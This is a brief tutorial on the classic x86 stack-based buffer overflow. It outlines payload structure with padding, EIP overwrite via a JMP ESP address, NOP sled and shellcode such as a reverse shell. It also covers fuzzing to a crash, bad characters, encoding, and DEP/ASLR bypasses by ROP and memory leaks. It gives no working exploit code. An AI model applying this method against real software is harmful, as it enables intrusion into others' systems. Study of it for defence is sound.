Script kiddies use Metasploit. Hackers write exploit modules. This guide covers the classic Stack-Based Buffer Overflow in x86 Assembly.
The Payload Structure
1. Padding: 'A' x 500 (Junk to fill the buffer).
2. EIP: The memory address we want to jump to (JMP ESP).
3. NOP Sled: '0x90' x 16. (If we land here, slide down to the code).
4. Shellcode: The actual virus payload (e.g., Reverse Shell).
1. Fuzzing
Send 100 'A's. Normal.
Send 500 'A's. Crash!
Debugger says: `EIP = 41414141`.
41 is Hex for 'A'. You successfully overwrote the Instruction Pointer. You control the flow.
2. Bad Characters
Before you send your shellcode, check for "Bad Chars".
\x00 (Null Byte) often breaks C strings (strcpy terminates).
\x0a (Line Feed) breaks HTTP.
If your shellcode contains these, the app will crash before executing. You must encode the shellcode (Shikata Ga Nai).
3. JMP ESP
We need to find a stable address in the memory (a DLL) that contains the instruction `JMP ESP` (Jump to Stack Pointer).
We point EIP to that address.
The CPU jumps there, sees `JMP ESP`, and jumps to our stack, where our Shellcode is waiting.
Modern Protections
This classic attack is stopped by DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization).
ASLR Bypass: Memory leaks to find the base address.
DEP Bypass: ROP (Return Oriented Programming). Chaining existing code chunks together.